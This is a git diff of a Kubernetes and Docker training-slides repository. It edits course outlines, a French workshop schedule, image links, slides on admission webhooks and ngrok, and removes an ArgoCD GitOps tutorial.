(i.e. which pods have requests and limits for CPU and memory)
|
||||
|
||||
- Then check *utilization*
|
||||
|
||||
(i.e. actual resource usage)
|
||||
|
||||
- Possible tools: `kubectl`, plugins like `view-allocations`, Prometheus...
|
||||
|
||||
---
|
||||
|
||||
## Follow best practices
|
||||
|
||||
- We want to make sure that *all* workloads have requests
|
||||
|
||||
(and perhaps limits, too!)
|
||||
|
||||
- Depending on the workload:
|
||||
|
||||
- edit its YAML manifest
|
||||
|
||||
- adjust its Helm values
|
||||
|
||||
- add LimitRange in its Namespace
|
||||
|
||||
- Then check again to confirm that the job has been done properly!
|
||||
|
||||
---
|
||||
|
||||
## Be future-proof!
|
||||
|
||||
- We want to make sure that *future* workloads will have requests, too
|
||||
|
||||
- How can that be implemented?
|
||||
@@ -1,5 +0,0 @@
|
||||
#!/bin/sh
|
||||
for LINK in $(cat */*.md | sed -n 's/^\[\(.*\)\]:.*/\1/p' | sort | uniq -d); do
|
||||
grep '^\['"$LINK"'\]:' */*.md
|
||||
done
|
||||
|
||||
117
slides/highfive.html
Normal file
117
slides/highfive.html
Normal file
@@ -0,0 +1,117 @@
|
||||
<?xml version="1.0"?>
|
||||
<html>
|
||||
<head>
|
||||
<style>
|
||||
td {
|
||||
background: #ccc;
|
||||
padding: 1em;
|
||||
}
|
||||
</style>
|
||||
</head>
|
||||
<body>
|
||||
<table>
|
||||
<tr>
|
||||
<td>Mardi 9 mai 2023</td>
|
||||
<td>
|
||||
<a href="1.yml.html">Docker Intensif</a>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td>Mercredi 10 mai 2023</td>
|
||||
<td>
|
||||
<a href="1.yml.html">Docker Intensif</a>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td>Jeudi 11 mai 2023</td>
|
||||
<td>
|
||||
<a href="1.yml.html">Docker Intensif</a>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td>Vendredi 12 mai 2023</td>
|
||||
<td>
|
||||
<a href="1.yml.html">Docker Intensif</a>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td>Lundi 15 mai 2023</td>
|
||||
<td>
|
||||
<a href="2.yml.html">Fondamentaux Kubernetes</a>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td>Mardi 16 mai 2023</td>
|
||||
<td>
|
||||
<a href="2.yml.html">Fondamentaux Kubernetes</a>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td>Mercredi 17 mai 2023</td>
|
||||
<td>
|
||||
<a href="2.yml.html">Fondamentaux Kubernetes</a>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td>Lundi 22 mai 2023</td>
|
||||
<td>
|
||||
<a href="2.yml.html">Fondamentaux Kubernetes</a>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td>Mardi 23 mai 2023</td>
|
||||
<td>
|
||||
<a href="4.yml.html">Kubernetes Avancé</a>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td>Mercredi 24 mai 2023</td>
|
||||
<td>
|
||||
<a href="4.yml.html">Kubernetes Avancé</a>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td>Jeudi 25 mai 2023</td>
|
||||
<td>
|
||||
<a href="4.yml.html">Kubernetes Avancé</a>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td>Vendredi 26 mai 2023</td>
|
||||
<td>
|
||||
<a href="4.yml.html">Kubernetes Avancé</a>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td>Mardi 30 mai 2023</td>
|
||||
<td>
|
||||
<a href="3.yml.html">Packaging d'applications pour Kubernetes</a>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td>Mercredi 31 mai 2023</td>
|
||||
<td>
|
||||
<a href="3.yml.html">Packaging d'applications pour Kubernetes</a>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td>Jeudi 1er juin 2023</td>
|
||||
<td>
|
||||
<a href="3.yml.html">Packaging d'applications pour Kubernetes</a>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td>Mardi 6 juin 2023</td>
|
||||
<td>
|
||||
<a href="5.yml.html">Opérer Kubernetes</a>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td>Mercredi 7 juin 2023</td>
|
||||
<td>
|
||||
<a href="5.yml.html">Opérer Kubernetes</a>
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
</body>
|
||||
</html>
|
||||
Binary file not shown.
|
Before Width: | Height: | Size: 103 KiB |
Binary file not shown.
|
Before Width: | Height: | Size: 22 KiB |
@@ -981,6 +981,10 @@
|
||||
# event: LISA
|
||||
# title: Deploying and Scaling Applications with Docker Swarm
|
||||
|
||||
#2015-09-24-strangeloop
|
||||
|
||||
|
||||
|
||||
- title: Introduction to Docker and Containers
|
||||
slides: intro-selfpaced.yml.html
|
||||
|
||||
|
||||
@@ -1,16 +1,16 @@
|
||||
https://prettypictures.container.training/containers/Container-Ship-Freighter-Navigation-Elbe-Romance-1782991.jpg
|
||||
https://prettypictures.container.training/containers/ShippingContainerSFBay.jpg
|
||||
https://prettypictures.container.training/containers/aerial-view-of-containers.jpg
|
||||
https://prettypictures.container.training/containers/blue-containers.jpg
|
||||
https://prettypictures.container.training/containers/chinook-helicopter-container.jpg
|
||||
https://prettypictures.container.training/containers/container-cranes.jpg
|
||||
https://prettypictures.container.training/containers/container-housing.jpg
|
||||
https://prettypictures.container.training/containers/containers-by-the-water.jpg
|
||||
https://prettypictures.container.training/containers/distillery-containers.jpg
|
||||
https://prettypictures.container.training/containers/lots-of-containers.jpg
|
||||
https://prettypictures.container.training/containers/plastic-containers.JPG
|
||||
https://prettypictures.container.training/containers/train-of-containers-1.jpg
|
||||
https://prettypictures.container.training/containers/train-of-containers-2.jpg
|
||||
https://prettypictures.container.training/containers/two-containers-on-a-truck.jpg
|
||||
https://prettypictures.container.training/containers/wall-of-containers.jpeg
|
||||
https://prettypictures.container.training/containers/catene-de-conteneurs.jpg
|
||||
https://gallant-turing-d0d520.netlify.com/containers/Container-Ship-Freighter-Navigation-Elbe-Romance-1782991.jpg
|
||||
https://gallant-turing-d0d520.netlify.com/containers/ShippingContainerSFBay.jpg
|
||||
https://gallant-turing-d0d520.netlify.com/containers/aerial-view-of-containers.jpg
|
||||
https://gallant-turing-d0d520.netlify.com/containers/blue-containers.jpg
|
||||
https://gallant-turing-d0d520.netlify.com/containers/chinook-helicopter-container.jpg
|
||||
https://gallant-turing-d0d520.netlify.com/containers/container-cranes.jpg
|
||||
https://gallant-turing-d0d520.netlify.com/containers/container-housing.jpg
|
||||
https://gallant-turing-d0d520.netlify.com/containers/containers-by-the-water.jpg
|
||||
https://gallant-turing-d0d520.netlify.com/containers/distillery-containers.jpg
|
||||
https://gallant-turing-d0d520.netlify.com/containers/lots-of-containers.jpg
|
||||
https://gallant-turing-d0d520.netlify.com/containers/plastic-containers.JPG
|
||||
https://gallant-turing-d0d520.netlify.com/containers/train-of-containers-1.jpg
|
||||
https://gallant-turing-d0d520.netlify.com/containers/train-of-containers-2.jpg
|
||||
https://gallant-turing-d0d520.netlify.com/containers/two-containers-on-a-truck.jpg
|
||||
https://gallant-turing-d0d520.netlify.com/containers/wall-of-containers.jpeg
|
||||
https://gallant-turing-d0d520.netlify.com/containers/catene-de-conteneurs.jpg
|
||||
|
||||
72
slides/intro-fullday.yml
Normal file
72
slides/intro-fullday.yml
Normal file
@@ -0,0 +1,72 @@
|
||||
title: |
|
||||
Introduction
|
||||
to Containers
|
||||
|
||||
chat: "[Slack](https://dockercommunity.slack.com/messages/C7GKACWDV)"
|
||||
#chat: "[Gitter](https://gitter.im/jpetazzo/workshop-yyyymmdd-city)"
|
||||
|
||||
gitrepo: github.com/jpetazzo/container.training
|
||||
|
||||
slides: https://container.training/
|
||||
|
||||
#slidenumberprefix: "#SomeHashTag — "
|
||||
|
||||
exclude:
|
||||
- self-paced
|
||||
|
||||
content:
|
||||
- shared/title.md
|
||||
- logistics.md
|
||||
- containers/intro.md
|
||||
- shared/about-slides.md
|
||||
- shared/chat-room-im.md
|
||||
#- shared/chat-room-slack.md
|
||||
#- shared/chat-room-zoom-meeting.md
|
||||
#- shared/chat-room-zoom-webinar.md
|
||||
- shared/toc.md
|
||||
-
|
||||
#- containers/Docker_Overview.md
|
||||
#- containers/Docker_History.md
|
||||
- containers/Training_Environment.md
|
||||
#- containers/Installing_Docker.md
|
||||
- containers/First_Containers.md
|
||||
- containers/Background_Containers.md
|
||||
#- containers/Start_And_Attach.md
|
||||
- containers/Naming_And_Inspecting.md
|
||||
#- containers/Labels.md
|
||||
- containers/Getting_Inside.md
|
||||
- containers/Initial_Images.md
|
||||
-
|
||||
- containers/Building_Images_Interactively.md
|
||||
- containers/Building_Images_With_Dockerfiles.md
|
||||
- containers/Cmd_And_Entrypoint.md
|
||||
- containers/Copying_Files_During_Build.md
|
||||
- containers/Exercise_Dockerfile_Basic.md
|
||||
-
|
||||
- containers/Container_Networking_Basics.md
|
||||
#- containers/Network_Drivers.md
|
||||
- containers/Local_Development_Workflow.md
|
||||
- containers/Container_Network_Model.md
|
||||
- shared/yaml.md
|
||||
- containers/Compose_For_Dev_Stacks.md
|
||||
- containers/Exercise_Composefile.md
|
||||
-
|
||||
- containers/Multi_Stage_Builds.md
|
||||
#- containers/Publishing_To_Docker_Hub.md
|
||||
- containers/Dockerfile_Tips.md
|
||||
- containers/Exercise_Dockerfile_Advanced.md
|
||||
#- containers/Docker_Machine.md
|
||||
#- containers/Advanced_Dockerfiles.md
|
||||
#- containers/Buildkit.md
|
||||
#- containers/Init_Systems.md
|
||||
#- containers/Application_Configuration.md
|
||||
#- containers/Logging.md
|
||||
#- containers/Namespaces_Cgroups.md
|
||||
#- containers/Copy_On_Write.md
|
||||
#- containers/Containers_From_Scratch.md
|
||||
#- containers/Container_Engines.md
|
||||
#- containers/Pods_Anatomy.md
|
||||
#- containers/Ecosystem.md
|
||||
#- containers/Orchestration_Overview.md
|
||||
- shared/thankyou.md
|
||||
- containers/links.md
|
||||
73
slides/intro-selfpaced.yml
Normal file
73
slides/intro-selfpaced.yml
Normal file
@@ -0,0 +1,73 @@
|
||||
title: |
|
||||
Introduction
|
||||
to Containers
|
||||
|
||||
chat: "[Slack](https://dockercommunity.slack.com/messages/C7GKACWDV)"
|
||||
#chat: "[Gitter](https://gitter.im/jpetazzo/workshop-yyyymmdd-city)"
|
||||
|
||||
gitrepo: github.com/jpetazzo/container.training
|
||||
|
||||
slides: https://container.training/
|
||||
|
||||
#slidenumberprefix: "#SomeHashTag — "
|
||||
|
||||
exclude:
|
||||
- in-person
|
||||
|
||||
content:
|
||||
- shared/title.md
|
||||
# - shared/logistics.md
|
||||
- containers/intro.md
|
||||
- shared/about-slides.md
|
||||
#- shared/chat-room-im.md
|
||||
#- shared/chat-room-slack.md
|
||||
#- shared/chat-room-zoom-meeting.md
|
||||
#- shared/chat-room-zoom-webinar.md
|
||||
- shared/toc.md
|
||||
- - containers/Docker_Overview.md
|
||||
- containers/Docker_History.md
|
||||
- containers/Training_Environment.md
|
||||
- containers/Installing_Docker.md
|
||||
- containers/First_Containers.md
|
||||
- containers/Background_Containers.md
|
||||
- containers/Start_And_Attach.md
|
||||
- - containers/Initial_Images.md
|
||||
- containers/Building_Images_Interactively.md
|
||||
- containers/Building_Images_With_Dockerfiles.md
|
||||
- containers/Cmd_And_Entrypoint.md
|
||||
- containers/Copying_Files_During_Build.md
|
||||
- containers/Exercise_Dockerfile_Basic.md
|
||||
- - containers/Multi_Stage_Builds.md
|
||||
- containers/Publishing_To_Docker_Hub.md
|
||||
- containers/Dockerfile_Tips.md
|
||||
- containers/Exercise_Dockerfile_Advanced.md
|
||||
- - containers/Naming_And_Inspecting.md
|
||||
- containers/Labels.md
|
||||
- containers/Getting_Inside.md
|
||||
- - containers/Container_Networking_Basics.md
|
||||
- containers/Network_Drivers.md
|
||||
- containers/Container_Network_Model.md
|
||||
#- containers/Connecting_Containers_With_Links.md
|
||||
- containers/Ambassadors.md
|
||||
- - containers/Local_Development_Workflow.md
|
||||
- containers/Windows_Containers.md
|
||||
- containers/Working_With_Volumes.md
|
||||
- shared/yaml.md
|
||||
- containers/Compose_For_Dev_Stacks.md
|
||||
- containers/Exercise_Composefile.md
|
||||
- containers/Docker_Machine.md
|
||||
- - containers/Advanced_Dockerfiles.md
|
||||
- containers/Buildkit.md
|
||||
- containers/Init_Systems.md
|
||||
- containers/Application_Configuration.md
|
||||
- containers/Logging.md
|
||||
- containers/Resource_Limits.md
|
||||
- - containers/Namespaces_Cgroups.md
|
||||
- containers/Copy_On_Write.md
|
||||
#- containers/Containers_From_Scratch.md
|
||||
- - containers/Container_Engines.md
|
||||
- containers/Pods_Anatomy.md
|
||||
- containers/Ecosystem.md
|
||||
- containers/Orchestration_Overview.md
|
||||
- shared/thankyou.md
|
||||
- containers/links.md
|
||||
81
slides/intro-twodays.yml
Normal file
81
slides/intro-twodays.yml
Normal file
@@ -0,0 +1,81 @@
|
||||
title: |
|
||||
Introduction
|
||||
to Containers
|
||||
|
||||
chat: "[Slack](https://dockercommunity.slack.com/messages/C7GKACWDV)"
|
||||
#chat: "[Gitter](https://gitter.im/jpetazzo/workshop-yyyymmdd-city)"
|
||||
|
||||
gitrepo: github.com/jpetazzo/container.training
|
||||
|
||||
slides: https://container.training/
|
||||
|
||||
#slidenumberprefix: "#SomeHashTag — "
|
||||
|
||||
exclude:
|
||||
- self-paced
|
||||
|
||||
content:
|
||||
- shared/title.md
|
||||
- logistics.md
|
||||
- containers/intro.md
|
||||
- shared/about-slides.md
|
||||
- shared/chat-room-im.md
|
||||
#- shared/chat-room-slack.md
|
||||
#- shared/chat-room-zoom-meeting.md
|
||||
#- shared/chat-room-zoom-webinar.md
|
||||
- shared/toc.md
|
||||
- # DAY 1
|
||||
- containers/Docker_Overview.md
|
||||
#- containers/Docker_History.md
|
||||
- containers/Training_Environment.md
|
||||
- containers/First_Containers.md
|
||||
- containers/Background_Containers.md
|
||||
- containers/Initial_Images.md
|
||||
-
|
||||
- containers/Building_Images_Interactively.md
|
||||
- containers/Building_Images_With_Dockerfiles.md
|
||||
- containers/Cmd_And_Entrypoint.md
|
||||
- containers/Copying_Files_During_Build.md
|
||||
- containers/Exercise_Dockerfile_Basic.md
|
||||
-
|
||||
- containers/Dockerfile_Tips.md
|
||||
- containers/Multi_Stage_Builds.md
|
||||
- containers/Publishing_To_Docker_Hub.md
|
||||
- containers/Exercise_Dockerfile_Advanced.md
|
||||
-
|
||||
- containers/Naming_And_Inspecting.md
|
||||
- containers/Labels.md
|
||||
- containers/Start_And_Attach.md
|
||||
- containers/Getting_Inside.md
|
||||
- containers/Resource_Limits.md
|
||||
- # DAY 2
|
||||
- containers/Container_Networking_Basics.md
|
||||
- containers/Network_Drivers.md
|
||||
- containers/Container_Network_Model.md
|
||||
-
|
||||
- containers/Local_Development_Workflow.md
|
||||
- containers/Working_With_Volumes.md
|
||||
- shared/yaml.md
|
||||
- containers/Compose_For_Dev_Stacks.md
|
||||
- containers/Exercise_Composefile.md
|
||||
-
|
||||
- containers/Installing_Docker.md
|
||||
- containers/Container_Engines.md
|
||||
- containers/Init_Systems.md
|
||||
- containers/Advanced_Dockerfiles.md
|
||||
- containers/Buildkit.md
|
||||
-
|
||||
- containers/Application_Configuration.md
|
||||
- containers/Logging.md
|
||||
- containers/Orchestration_Overview.md
|
||||
-
|
||||
- shared/thankyou.md
|
||||
- containers/links.md
|
||||
#-
|
||||
#- containers/Docker_Machine.md
|
||||
#- containers/Ambassadors.md
|
||||
#- containers/Namespaces_Cgroups.md
|
||||
#- containers/Copy_On_Write.md
|
||||
#- containers/Containers_From_Scratch.md
|
||||
#- containers/Pods_Anatomy.md
|
||||
#- containers/Ecosystem.md
|
||||
@@ -20,21 +20,19 @@
|
||||
|
||||
## Use cases
|
||||
|
||||
- Defaulting
|
||||
Some examples ...
|
||||
|
||||
*injecting image pull secrets, sidecars, environment variables...*
|
||||
- Stand-alone admission controllers
|
||||
|
||||
- Policy enforcement and best practices
|
||||
*validating:* policy enforcement (e.g. quotas, naming conventions ...)
|
||||
|
||||
*prevent: `latest` images, deprecated APIs...*
|
||||
*mutating:* inject or provide default values (e.g. pod presets)
|
||||
|
||||
*require: PDBs, resource requests/limits, labels/annotations, local registry...*
|
||||
- Admission controllers part of a greater system
|
||||
|
||||
- Problem mitigation
|
||||
*validating:* advanced typing for operators
|
||||
|
||||
*block nodes with vulnerable kernels, inject log4j mitigations...*
|
||||
|
||||
- Extended validation for operators
|
||||
*mutating:* inject sidecars for service meshes
|
||||
|
||||
---
|
||||
|
||||
@@ -200,64 +198,6 @@
|
||||
|
||||
(the Node "echo" app, the Flask app, and one ngrok tunnel for each of them)
|
||||
|
||||
- We will need an ngrok account for the tunnels
|
||||
|
||||
(a free account is fine)
|
||||
|
||||
---
|
||||
|
||||
class: extra-details
|
||||
|
||||
## What's ngrok?
|
||||
|
||||
- Ngrok provides secure tunnels to access local services
|
||||
|
||||
- Example: run `ngrok http 1234`
|
||||
|
||||
- `ngrok` will display a publicly-available URL (e.g. https://xxxxyyyyzzzz.ngrok.app)
|
||||
|
||||
- Connections to https://xxxxyyyyzzzz.ngrok.app will terminate at `localhost:1234`
|
||||
|
||||
- Basic product is free; extra features (vanity domains, end-to-end TLS...) for $$$
|
||||
|
||||
- Perfect to develop our webhook!
|
||||
|
||||
---
|
||||
|
||||
class: extra-details
|
||||
|
||||
## Ngrok in production
|
||||
|
||||
- Ngrok was initially known for its local webhook development features
|
||||
|
||||
- It now supports production scenarios as well
|
||||
|
||||
(load balancing, WAF, authentication, circuit-breaking...)
|
||||
|
||||
- Including some that are very relevant to Kubernetes
|
||||
|
||||
    (e.g. [ngrok Ingress Controller](https://github.com/ngrok/kubernetes-ingress-controller))
|
||||
|
||||
---
|
||||
|
||||
## Ngrok tokens
|
||||
|
||||
- If you're attending a live training, you might have an ngrok token
|
||||
|
||||
- Look in `~/ngrok.env` and if that file exists, copy it to the stack:
|
||||
|
||||
.lab[
|
||||
|
||||
```bash
|
||||
cp ~/ngrok.env ~/container.training/webhooks/admission/.env
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Starting the whole stack
|
||||
|
||||
.lab[
|
||||
|
||||
- Go to the webhook directory:
|
||||
@@ -276,6 +216,28 @@ cp ~/ngrok.env ~/container.training/webhooks/admission/.env
|
||||
|
||||
---
|
||||
|
||||
class: extra-details
|
||||
|
||||
## What's ngrok?
|
||||
|
||||
- Ngrok provides secure tunnels to access local services
|
||||
|
||||
- Example: run `ngrok http 1234`
|
||||
|
||||
- `ngrok` will display a publicly-available URL (e.g. https://xxxxyyyyzzzz.ngrok.io)
|
||||
|
||||
- Connections to https://xxxxyyyyzzzz.ngrok.io will terminate at `localhost:1234`
|
||||
|
||||
- Basic product is free; extra features (vanity domains, end-to-end TLS...) for $$$
|
||||
|
||||
- Perfect to develop our webhook!
|
||||
|
||||
- Probably not for production, though
|
||||
|
||||
(webhook requests and responses now pass through the ngrok platform)
|
||||
|
||||
---
|
||||
|
||||
## Update the webhook configuration
|
||||
|
||||
- We have a webhook configuration in `k8s/webhook-configuration.yaml`
|
||||
@@ -581,23 +543,6 @@ Shell to the rescue!
|
||||
|
||||
(it should only allow values of `red`, `green`, `blue`)
|
||||
|
||||
---
|
||||
|
||||
## Coming soon...
|
||||
|
||||
- Kubernetes Validating Admission Policies
|
||||
|
||||
- Integrated with the Kubernetes API server
|
||||
|
||||
- Lets us define policies using [CEL (Common Expression Language)][cel-spec]
|
||||
|
||||
- Available in beta in Kubernetes 1.28 <!-- ##VERSION## -->
|
||||
|
||||
- Check this [CNCF Blog Post][cncf-blog-vap] for more details
|
||||
|
||||
[cncf-blog-vap]: https://www.cncf.io/blog/2023/09/14/policy-management-in-kubernetes-is-changing/
|
||||
[cel-spec]: https://github.com/google/cel-spec
|
||||
|
||||
???
|
||||
|
||||
:EN:- Dynamic admission control with webhooks
|
||||
|
||||
@@ -141,6 +141,12 @@ class: pic
|
||||
|
||||
class: pic
|
||||
|
||||

|
||||
|
||||
---
|
||||
|
||||
class: pic
|
||||
|
||||

|
||||
|
||||
---
|
||||
@@ -151,12 +157,6 @@ class: pic
|
||||
|
||||
---
|
||||
|
||||
class: pic
|
||||
|
||||

|
||||
|
||||
---
|
||||
|
||||
# The Kubernetes API
|
||||
|
||||
[
|
||||
|
||||
@@ -1,592 +0,0 @@
|
||||
# ArgoCD
|
||||
|
||||
- We're going to implement a basic GitOps workflow with ArgoCD
|
||||
|
||||
- Pushing to the default branch will automatically deploy to our clusters
|
||||
|
||||
- There will be two clusters (`dev` and `prod`)
|
||||
|
||||
- The two clusters will have similar (but slightly different) workloads
|
||||
|
||||

|
||||
|
||||
---
|
||||
|
||||
## ArgoCD concepts
|
||||
|
||||
ArgoCD manages **applications** by **syncing** their **live state** with their **target state**.
|
||||
|
||||
- **Application**: a group of Kubernetes resources managed by ArgoCD.
|
||||
<br/>
|
||||
Also a custom resource (`kind: Application`) managing that group of resources.
|
||||
|
||||
- **Application source type**: the **Tool** used to build the application (Kustomize, Helm...)
|
||||
|
||||
- **Target state**: the desired state of an **application**, as represented by the git repository.
|
||||
|
||||
- **Live state**: the current state of the application on the cluster.
|
||||
|
||||
- **Sync status**: whether or not the live state matches the target state.
|
||||
|
||||
- **Sync**: the process of making an application move to its target state.
|
||||
<br/>
|
||||
(e.g. by applying changes to a Kubernetes cluster)
|
||||
|
||||
(Check [ArgoCD core concepts](https://argo-cd.readthedocs.io/en/stable/core_concepts/) for more definitions!)
|
||||
|
||||
---
|
||||
|
||||
## Getting ready
|
||||
|
||||
- Let's make sure we have two clusters
|
||||
|
||||
- It's OK to use local clusters (kind, minikube...)
|
||||
|
||||
- We need to install the ArgoCD CLI ([argocd-packages], [argocd-binaries])
|
||||
|
||||
- **Highly recommended:** set up CLI completion!
|
||||
|
||||
- Of course we'll need a Git service, too
|
||||
|
||||
---
|
||||
|
||||
## Setting up ArgoCD
|
||||
|
||||
- The easiest way is to use upstream YAML manifests
|
||||
|
||||
- There is also a [Helm chart][argocd-helmchart] if we need more customization
|
||||
|
||||
.lab[
|
||||
|
||||
- Create a namespace for ArgoCD and install it there:
|
||||
```bash
|
||||
kubectl create namespace argocd
|
||||
kubectl apply --namespace argocd -f \
|
||||
https://raw.githubusercontent.com/argoproj/argo-cd/stable/manifests/install.yaml
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Logging in with the ArgoCD CLI
|
||||
|
||||
- The CLI can talk to the ArgoCD API server or to the Kubernetes API server
|
||||
|
||||
- For simplicity, we're going to authenticate and communicate with the Kubernetes API
|
||||
|
||||
.lab[
|
||||
|
||||
- Authenticate with the ArgoCD API (that's what the `--core` flag does):
|
||||
```bash
|
||||
argocd login --core
|
||||
```
|
||||
|
||||
- Check that everything is fine:
|
||||
```bash
|
||||
argocd version
|
||||
```
|
||||
]
|
||||
|
||||
--
|
||||
|
||||
🤔 `FATA[0000] error retrieving argocd-cm: configmap "argocd-cm" not found`
|
||||
|
||||
---
|
||||
|
||||
## ArgoCD CLI shortcomings
|
||||
|
||||
- When using "core" authentication, the ArgoCD CLI uses our current Kubernetes context
|
||||
|
||||
(as defined in our kubeconfig file)
|
||||
|
||||
- That context needs to point to the correct namespace
|
||||
|
||||
(the namespace where we installed ArgoCD)
|
||||
|
||||
- In fact, `argocd login --core` doesn't communicate at all with ArgoCD!
|
||||
|
||||
(it only updates a local ArgoCD configuration file)
|
||||
|
||||
---
|
||||
|
||||
## Trying again in the right namespace
|
||||
|
||||
- We will need to run all `argocd` commands in the `argocd` namespace
|
||||
|
||||
(this limitation only applies to "core" authentication; see [issue 14167][issue14167])
|
||||
|
||||
.lab[
|
||||
|
||||
- Switch to the `argocd` namespace:
|
||||
```bash
|
||||
kubectl config set-context --current --namespace argocd
|
||||
```
|
||||
|
||||
- Check that we can communicate with the ArgoCD API now:
|
||||
```bash
|
||||
argocd version
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
- Let's have a look at ArgoCD architecture!
|
||||
|
||||
---
|
||||
|
||||
class: pic
|
||||
|
||||

|
||||
|
||||
---
|
||||
|
||||
## ArgoCD API Server
|
||||
|
||||
The API server is a gRPC/REST server which exposes the API consumed by the Web UI, CLI, and CI/CD systems. It has the following responsibilities:
|
||||
|
||||
- application management and status reporting
|
||||
|
||||
- invoking of application operations (e.g. sync, rollback, user-defined actions)
|
||||
|
||||
- repository and cluster credential management (stored as K8s secrets)
|
||||
|
||||
- authentication and auth delegation to external identity providers
|
||||
|
||||
- RBAC enforcement
|
||||
|
||||
- listener/forwarder for Git webhook events
|
||||
|
||||
---
|
||||
|
||||
## ArgoCD Repository Server
|
||||
|
||||
The repository server is an internal service which maintains a local cache of the Git repositories holding the application manifests. It is responsible for generating and returning the Kubernetes manifests when provided the following inputs:
|
||||
|
||||
- repository URL
|
||||
|
||||
- revision (commit, tag, branch)
|
||||
|
||||
- application path
|
||||
|
||||
- template specific settings: parameters, helm values...
|
||||
|
||||
---
|
||||
|
||||
## ArgoCD Application Controller
|
||||
|
||||
The application controller is a Kubernetes controller which continuously monitors running applications and compares the current, live state against the desired target state (as specified in the repo).
|
||||
|
||||
It detects *OutOfSync* application state and optionally takes corrective action.
|
||||
|
||||
It is responsible for invoking any user-defined hooks for lifecycle events (*PreSync, Sync, PostSync*).
|
||||
|
||||
---
|
||||
|
||||
## Preparing a repository for ArgoCD
|
||||
|
||||
- We need a repository with Kubernetes YAML manifests
|
||||
|
||||
- You can fork [kubercoins] or create a new, empty repository
|
||||
|
||||
- If you create a new, empty repository, add some manifests to it
|
||||
|
||||
---
|
||||
|
||||
## Add an Application
|
||||
|
||||
- An Application can be added to ArgoCD via the web UI or the CLI
|
||||
|
||||
(either way, this will create a custom resource of `kind: Application`)
|
||||
|
||||
- The Application should then automatically be deployed to our cluster
|
||||
|
||||
(the application manifests will be "applied" to the cluster)
|
||||
|
||||
.lab[
|
||||
|
||||
- Let's use the CLI to add an Application:
|
||||
```bash
|
||||
argocd app create kubercoins \
|
||||
--repo https://github.com/`<your_user>/<your_repo>`.git \
|
||||
--path . --revision `<branch>` \
|
||||
--dest-server https://kubernetes.default.svc \
|
||||
--dest-namespace kubercoins-prod
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Checking progress
|
||||
|
||||
- We can see sync status in the web UI or with the CLI
|
||||
|
||||
.lab[
|
||||
|
||||
- Let's check app status with the CLI:
|
||||
```bash
|
||||
argocd app list
|
||||
```
|
||||
|
||||
- We can also check directly with the Kubernetes CLI:
|
||||
```bash
|
||||
kubectl get applications
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
- The app is there and it is `OutOfSync`!
|
||||
|
||||
---
|
||||
|
||||
## Manual sync with the CLI
|
||||
|
||||
- By default the "sync policy" is `manual`
|
||||
|
||||
- It can also be set to `auto`, which would check the git repository every 3 minutes
|
||||
|
||||
(this interval can be [configured globally][pollinginterval])
|
||||
|
||||
- Manual sync can be triggered with the CLI
|
||||
|
||||
.lab[
|
||||
|
||||
- Let's force an immediate sync of our app:
|
||||
```bash
|
||||
argocd app sync kubercoins
|
||||
```
|
||||
]
|
||||
|
||||
🤔 We're getting errors!
|
||||
|
||||
---
|
||||
|
||||
## Sync failed
|
||||
|
||||
We should receive a failure:
|
||||
|
||||
`FATA[0000] Operation has completed with phase: Failed`
|
||||
|
||||
And in the output, we see more details:
|
||||
|
||||
`Message: one or more objects failed to apply,`
|
||||
<br/>
|
||||
`reason: namespaces "kubercoins-prod" not found`
|
||||
|
||||
---
|
||||
|
||||
## Creating the namespace
|
||||
|
||||
- There are multiple ways to achieve that
|
||||
|
||||
- We could generate a YAML manifest for the namespace and add it to the git repository
|
||||
|
||||
- Or we could use "Sync Options" so that ArgoCD creates it automatically!
|
||||
|
||||
- ArgoCD provides many "Sync Options" to handle various edge cases
|
||||
|
||||
- Some [others](https://argo-cd.readthedocs.io/en/stable/user-guide/sync-options/) are: `FailOnSharedResource`, `PruneLast`, `PrunePropagationPolicy`...
|
||||
|
||||
---
|
||||
|
||||
## Editing the app's sync options
|
||||
|
||||
- This can be done through the web UI or the CLI
|
||||
|
||||
.lab[
|
||||
|
||||
- Let's use the CLI once again:
|
||||
```bash
|
||||
argocd app edit kubercoins
|
||||
```
|
||||
|
||||
- Add the following to the YAML manifest, at the root level:
|
||||
```yaml
|
||||
syncPolicy:
|
||||
syncOptions:
|
||||
- CreateNamespace=true
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Sync again
|
||||
|
||||
.lab[
|
||||
|
||||
- Let's retry the sync operation:
|
||||
```bash
|
||||
argocd app sync kubercoins
|
||||
```
|
||||
|
||||
- And check the application status:
|
||||
```bash
|
||||
argocd app list
|
||||
kubectl get applications
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
- It should show `Synced` and `Progressing`
|
||||
|
||||
- After a while (when all pods are running correctly) it should be `Healthy`
|
||||
|
||||
---
|
||||
|
||||
## Managing Applications via the Web UI
|
||||
|
||||
- ArgoCD is popular in large part due to its browser-based UI
|
||||
|
||||
- Let's see how to manage Applications in the web UI
|
||||
|
||||
.lab[
|
||||
|
||||
- Expose the web dashboard on a local port:
|
||||
```bash
|
||||
argocd admin dashboard
|
||||
```
|
||||
|
||||
- This command will show the dashboard URL; open it in a browser
|
||||
|
||||
- Authentication should be automatic
|
||||
|
||||
]
|
||||
|
||||
